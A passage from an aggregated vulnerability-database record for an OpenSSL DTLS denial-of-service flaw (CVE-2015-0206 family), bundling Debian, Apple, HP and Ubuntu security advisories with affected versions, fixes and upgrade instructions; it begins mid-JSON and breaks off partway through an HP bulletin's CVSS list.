"db": "PACKETSTORM", "id": "143259" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "NVD", "id": "CVE-2016-2519" }, { "db": "CNNVD", "id": "CNNVD-201604-610" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-27T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2017-01-30T00:00:00", "db": "VULMON", "id": "CVE-2016-2519" }, { "date": "2016-04-26T00:00:00", "db": "BID", "id": "88204" }, { "date": "2017-03-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-007715" }, { "date": "2017-07-06T20:21:00", "db": "PACKETSTORM", "id": "143259" }, { "date": "2016-07-21T15:56:23", "db": "PACKETSTORM", "id": "137992" }, { "date": "2016-05-02T21:38:58", "db": "PACKETSTORM", "id": "136864" }, { "date": "2017-01-30T21:59:01.113000", "db": "NVD", "id": "CVE-2016-2519" }, { "date": "2016-04-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-610" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-28T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2017-11-21T00:00:00", "db": "VULMON", "id": "CVE-2016-2519" }, { "date": "2017-07-06T13:05:00", "db": "BID", "id": "88204" }, { "date": "2017-03-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-007715" }, { "date": "2017-11-21T02:29:04.213000", "db": "NVD", "id": "CVE-2016-2519" }, { "date": "2017-02-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-610" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "143259" }, { "db": "CNNVD", "id": "CNNVD-201604-610" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP.org ntpd contains multiple vulnerabilities", "sources": [ { "db": "CERT/CC", "id": "VU#718152" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-610" } ], "trust": 0.6 } }
var-201501-0435
Vulnerability from variot
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. An attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-3125-1 security@debian.org http://www.debian.org/security/ Salvatore Bonaccorso January 11, 2015 http://www.debian.org/security/faq
Package : openssl CVE ID : CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206
Multiple vulnerabilities have been discovered in OpenSSL, a Secure Sockets Layer toolkit. The Common Vulnerabilities and Exposures project identifies the following issues:
CVE-2014-3569
Frank Schmirler reported that the ssl23_get_client_hello function in
OpenSSL does not properly handle attempts to use unsupported
protocols. When OpenSSL is built with the no-ssl3 option and a SSL
v3 ClientHello is received, the ssl method would be set to NULL which
could later result in a NULL pointer dereference and daemon crash.
CVE-2014-3570
Pieter Wuille of Blockstream reported that the bignum squaring
(BN_sqr) may produce incorrect results on some platforms, which
might make it easier for remote attackers to defeat cryptographic
protection mechanisms.
CVE-2014-3571
Markus Stenberg of Cisco Systems, Inc. A remote attacker could use this flaw
to mount a denial of service attack.
CVE-2014-3572
Karthikeyan Bhargavan of the PROSECCO team at INRIA reported that an
OpenSSL client would accept a handshake using an ephemeral ECDH
ciphersuite if the server key exchange message is omitted. This
allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks
and trigger a loss of forward secrecy.
CVE-2014-8275
Antti Karjalainen and Tuomo Untinen of the Codenomicon CROSS project
and Konrad Kraszewski of Google reported various certificate
fingerprint issues, which allow remote attackers to defeat a
fingerprint-based certificate-blacklist protection mechanism.
CVE-2015-0204
Karthikeyan Bhargavan of the PROSECCO team at INRIA reported that
an OpenSSL client will accept the use of an ephemeral RSA key in a
non-export RSA key exchange ciphersuite, violating the TLS
standard. This allows remote SSL servers to downgrade the security
of the session.
CVE-2015-0205
Karthikeyan Bhargavan of the PROSECCO team at INRIA reported that an
OpenSSL server will accept a DH certificate for client
authentication without the certificate verify message. This flaw
effectively allows a client to authenticate without the use of a
private key via crafted TLS handshake protocol traffic to a server
that recognizes a certification authority with DH support.
CVE-2015-0206
Chris Mueller discovered a memory leak in the dtls1_buffer_record
function. A remote attacker could exploit this flaw to mount a
denial of service through memory exhaustion by repeatedly sending
specially crafted DTLS records.
For the stable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u14.
For the upcoming stable distribution (jessie), these problems will be fixed soon.
For the unstable distribution (sid), these problems have been fixed in version 1.0.1k-1.
We recommend that you upgrade your openssl packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004
OS X Yosemite 10.10.3 and Security Update 2015-004 are now available and address the following:
Admin Framework Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A process may gain admin privileges without properly authenticating Description: An issue existed when checking XPC entitlements. This issue was addressed with improved entitlement checking. CVE-ID CVE-2015-1130 : Emil Kvarnhammar at TrueSec
apache Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in Apache Description: Multiple vulnerabilities existed in Apache versions prior to 2.4.10 and 2.2.29, including one that may allow a remote attacker to execute arbitrary code. These issues were addressed by updating Apache to versions 2.4.10 and 2.2.29 CVE-ID CVE-2013-0118 CVE-2013-5704 CVE-2013-6438 CVE-2014-0098 CVE-2014-0117 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-3523
ATS Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: Multiple input validation issues existed in fontd. These issues were addressed through improved input validation. CVE-ID CVE-2015-1131 : Ian Beer of Google Project Zero CVE-2015-1132 : Ian Beer of Google Project Zero CVE-2015-1133 : Ian Beer of Google Project Zero CVE-2015-1134 : Ian Beer of Google Project Zero CVE-2015-1135 : Ian Beer of Google Project Zero
Certificate Trust Policy Impact: Update to the certificate trust policy Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858.
CFNetwork HTTPProtocol Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Cookies belonging to one origin may be sent to another origin Description: A cross-domain cookie issue existed in redirect handling. Cookies set in a redirect response could be passed on to a redirect target belonging to another origin. The issue was address through improved handling of redirects. CVE-ID CVE-2015-1089 : Niklas Keller
CFNetwork Session Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Authentication credentials may be sent to a server on another origin Description: A cross-domain HTTP request headers issue existed in redirect handling. HTTP request headers sent in a redirect response could be passed on to another origin. The issue was addressed through improved handling of redirects. CVE-ID CVE-2015-1091 : Diego Torres (http://dtorres.me)
CFURL Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An input validation issue existed within URL processing. This issue was addressed through improved URL validation. CVE-ID CVE-2015-1088 : Luigi Galli
CoreAnimation Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A use-after-free issue existed in CoreAnimation. This issue was addressed through improved mutex management. CVE-ID CVE-2015-1136 : Apple
FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-1093 : Marc Schoenefeld
Graphics Driver Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A NULL pointer dereference existed in NVIDIA graphics driver's handling of certain IOService userclient types. This issue was addressed through additional context validation. CVE-ID CVE-2015-1137 : Frank Graziano and John Villamil of the Yahoo Pentest Team
Hypervisor Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local application may be able to cause a denial of service Description: An input validation issue existed in the hypervisor framework. This issue was addressed through improved input validation. CVE-ID CVE-2015-1138 : Izik Eidus and Alex Fishman
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted .sgi file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of .sgi files. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1139 : Apple
IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A malicious HID device may be able to cause arbitrary code execution Description: A memory corruption issue existed in an IOHIDFamily API. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1095 : Andrew Church
IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow issue existed in IOHIDFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1140 : lokihardt@ASRT working with HP's Zero Day Initiative, Luca Todesco
IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to determine kernel memory layout Description: An issue existed in IOHIDFamily that led to the disclosure of kernel memory content. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1096 : Ilja van Sprundel of IOActive
IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A heap buffer overflow existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4404 : Ian Beer of Google Project Zero
IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A null pointer dereference existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved validation of IOHIDFamily key-mapping properties. CVE-ID CVE-2014-4405 : Ian Beer of Google Project Zero
IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A user may be able to execute arbitrary code with system privileges Description: An out-of-bounds write issue exited in the IOHIDFamily driver. The issue was addressed through improved input validation. CVE-ID CVE-2014-4380 : cunzhang from Adlab of Venustech
Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system shutdown Description: An issue existed in the handling of virtual memory operations within the kernel. The issue is fixed through improved handling of the mach_vm_read operation. CVE-ID CVE-2015-1141 : Ole Andre Vadla Ravnas of www.frida.re
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause a system denial of service Description: A race condition existed in the kernel's setreuid system call. This issue was addressed through improved state management. CVE-ID CVE-2015-1099 : Mark Mentovai of Google Inc.
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local application may escalate privileges using a compromised service intended to run with reduced privileges Description: setreuid and setregid system calls failed to drop privileges permanently. This issue was addressed by correctly dropping privileges. CVE-ID CVE-2015-1117 : Mark Mentovai of Google Inc.
Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to redirect user traffic to arbitrary hosts Description: ICMP redirects were enabled by default on OS X. This issue was addressed by disabling ICMP redirects. CVE-ID CVE-2015-1103 : Zimperium Mobile Security Labs
Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to cause a denial of service Description: A state inconsistency existed in the processing of TCP headers. This issue was addressed through improved state handling. CVE-ID CVE-2015-1102 : Andrey Khudyakov and Maxim Zhuravlev of Kaspersky Lab
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A out of bounds memory access issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1100 : Maxime Villard of m00nbsd
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to bypass network filters Description: The system would treat some IPv6 packets from remote network interfaces as local packets. The issue was addressed by rejecting these packets. CVE-ID CVE-2015-1104 : Stephen Roettger of the Google Security Team
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1101 : lokihardt@ASRT working with HP's Zero Day Initiative
Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to cause a denial of service Description: A state inconsistency issue existed in the handling of TCP out of band data. This issue was addressed through improved state management. CVE-ID CVE-2015-1105 : Kenton Varda of Sandstorm.io
LaunchServices Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause the Finder to crash Description: An input validation issue existed in LaunchServices's handling of application localization data. This issue was addressed through improved validation of localization data. CVE-ID CVE-2015-1142
LaunchServices Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A type confusion issue existed in LaunchServices's handling of localized strings. This issue was addressed through additional bounds checking. CVE-ID CVE-2015-1143 : Apple
libnetcore Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted configuration profile may lead to unexpected application termination Description: A memory corruption issue existed in the handling of configuration profiles. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1118 : Zhaofeng Chen, Hui Xue, Yulong Zhang, and Tao Wei of FireEye, Inc.
ntp Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may brute force ntpd authentication keys Description: The config_auth function in ntpd generated a weak key when an authentication key was not configured. This issue was addressed by improved key generation. CVE-ID CVE-2014-9298
OpenLDAP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote unauthenticated client may be able to cause a denial of service Description: Multiple input validation issues existed in OpenLDAP. These issues were addressed by improved input validation. CVE-ID CVE-2015-1545 : Ryan Tandy CVE-2015-1546 : Ryan Tandy
OpenSSL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in OpenSSL Description: Multiple vulnerabilities existed in OpenSSL 0.9.8zc, including one that may allow an attacker to intercept connections to a server that supports export-grade ciphers. These issues were addressed by updating OpenSSL to version 0.9.8zd. CVE-ID CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204
Open Directory Client Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A password might be sent unencrypted over the network when using Open Directory from OS X Server Description: If an Open Directory client was bound to an OS X Server but did not install the certificates of the OS X Server, and then a user on that client changed their password, the password change request was sent over the network without encryption. This issue was addressed by having the client require encryption for this case. CVE-ID CVE-2015-1147 : Apple
PHP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.3.29, 5.4.38, and 5.5.20, including one which may have led to arbitrary code execution. This update addresses the issues by updating PHP to versions 5.3.29, 5.4.38, and 5.5.20. CVE-ID CVE-2013-6712 CVE-2014-0207 CVE-2014-0237 CVE-2014-0238 CVE-2014-2497 CVE-2014-3478 CVE-2014-3479 CVE-2014-3480 CVE-2014-3487 CVE-2014-3538 CVE-2014-3587 CVE-2014-3597 CVE-2014-3668 CVE-2014-3669 CVE-2014-3670 CVE-2014-3710 CVE-2014-3981 CVE-2014-4049 CVE-2014-4670 CVE-2014-4698 CVE-2014-5120
QuickLook Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Opening a maliciously crafted iWork file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of iWork files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1098 : Christopher Hickstein
SceneKit Available for: OS X Mountain Lion v10.8.5 Impact: Viewing a maliciously crafted Collada file may lead to arbitrary code execution Description: A heap buffer overflow existed in SceneKit's handling of Collada files. Viewing a maliciously crafted Collada file may have led to arbitrary code execution. This issue was addressed through improved validation of accessor elements. CVE-ID CVE-2014-8830 : Jose Duart of Google Security Team
Screen Sharing Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A user's password may be logged to a local file Description: In some circumstances, Screen Sharing may log a user's password that is not readable by other users on the system. This issue was addressed by removing logging of credential. CVE-ID CVE-2015-1148 : Apple
Security - Code Signing Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Tampered applications may not be prevented from launching Description: Applications containing specially crafted bundles may have been able to launch without a completely valid signature. This issue was addressed by adding additional checks. CVE-ID CVE-2015-1145 CVE-2015-1146
UniformTypeIdentifiers Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow existed in the way Uniform Type Identifiers were handled. This issue was addressed with improved bounds checking. CVE-ID CVE-2015-1144 : Apple
WebKit Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in WebKit. This issues was addressed through improved memory handling. CVE-ID CVE-2015-1069 : lokihardt@ASRT working with HP's Zero Day Initiative
Security Update 2015-004 (available for OS X Mountain Lion v10.8.5 and OS X Mavericks v10.9.5) also addresses an issue caused by the fix for CVE-2015-1067 in Security Update 2015-002. This issue prevented Remote Apple Events clients on any version from connecting to the Remote Apple Events server. In default configurations, Remote Apple Events is not enabled.
OS X Yosemite 10.10.3 includes the security content of Safari 8.0.5. https://support.apple.com/en-us/HT204658
OS X Yosemite 10.10.3 and Security Update 2015-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJVJKj2AAoJEBcWfLTuOo7tDh4QAK0LxfwMRKcdOXOKpXsRz6lg lhZ+CLVcSepq8qBkFQ74f3B5CuhxD0IGQPaAuSXl51tWYdfN+92tkbmyZ9k8901l +I0vw6upeE+oqRnGtSRzq68UhcARbdV8V1+C0Xl3IIuuHc+xlEgvklDhF9Pc8XM6 DudGiVNqt6MOqd5Oc4s4FFF0nnpnyG9+UJem3mi4Ee88PwI4x1Hev7utPPmaPDzj cjkVeislko3QArNJxtBpkYudErA4eR5OX8Tdf12jAmPTtjrXUb3VigEf78Nna0RW kHTOGdB5EZ+YFZ8KlyIQlENBjTtI8CGdCF4/S/2xDN83NTRsimd5Y7LSjdd0uANo pqxAc3Gzn5xngWF1Qbb6V+XZBfz5NoeTq5BXBB5OHz4PSGaQuMsBA2RYFMzNLqWv D/T5U1JtzRLALt0lYAz63B0OhW7KXeLI9oer1Vo4wWF9O9cUFyuSI4JU5uYLQpJX kEpSFt4YPFFxMnlzCLzLkmVGax4w9M/tRHYeSKAnRlnsoPBtIGFItlNZE2RduD/R 5n2APoJa3banQ8miycGORYP3WsktDRZzBy+2QPWuz8sE3AvAkO9xWp8PrQBkqf/b 6CIG5UkCYITG2uzBXqnGbfDiEDvBLNN1Yq0ZZI23iYRxrdW0I0pv1CHio354q12G vVE37tYUU4PnLfwlcazq =MOsT -----END PGP SIGNATURE----- .
Softpaq: http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all- 4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all- 4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch applied, VMware cannot connect if security level is set to "Refuse insecure connections". Updating VMware to the latest package on ftp.hp.com will solve the problem. ============================================================================ Ubuntu Security Notice USN-2459-1 January 12, 2015
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL.
Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
Pieter Wuille discovered that OpenSSL incorrectly handled Bignum squaring. (CVE-2014-3570)
Markus Stenberg discovered that OpenSSL incorrectly handled certain crafted DTLS messages. (CVE-2014-3571)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain handshakes. (CVE-2014-3572)
Antti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that OpenSSL incorrectly handled certain certificate fingerprints. A remote attacker could possibly use this issue to trick certain applications that rely on the uniqueness of fingerprints. (CVE-2014-8275)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain key exchanges. (CVE-2015-0204)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled client authentication. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-0206)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.10: libssl1.0.0 1.0.1f-1ubuntu9.1
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.8
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.21
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.23
After a standard system update you need to reboot your computer to make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2459-1 CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275, CVE-2015-0204, CVE-2015-0205, CVE-2015-0206
Package Information: https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu9.1 https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.8 https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.21 https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.23 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04774019
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04774019 Version: 1
HPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-08-24 Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Matrix Operating Environment. The vulnerabilities could be exploited remotely resulting in unauthorized modification, unauthorized access, or unauthorized disclosure of information.
References:
CVE-2010-5107 CVE-2013-0248 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-1692 CVE-2014-3523 CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8142 CVE-2014-8275 CVE-2014-9427 CVE-2014-9652 CVE-2014-9653 CVE-2014-9705 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 CVE-2015-0207 CVE-2015-0208 CVE-2015-0209 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-0285 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0290 CVE-2015-0291 CVE-2015-0292 CVE-2015-0293 CVE-2015-1787 CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2015-2134 CVE-2015-2139 CVE-2015-2140 CVE-2015-2301 CVE-2015-2331 CVE-2015-2348 CVE-2015-2787 CVE-2015-3113 CVE-2015-5122 CVE-2015-5123 CVE-2015-5402 CVE-2015-5403 CVE-2015-5404 CVE-2015-5405 CVE-2015-5427 CVE-2015-5428 CVE-2015-5429 CVE-2015-5430 CVE-2015-5431 CVE-2015-5432 CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0 HP System Management Homepage (SMH) prior to version 7.5.0 HP Version Control Agent (VCA) prior to version 7.5.0 HP Version Control Repository Manager (VCRM) prior to version 7.5.0 HP Insight Orchestration prior to version 7.5.0 HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0288 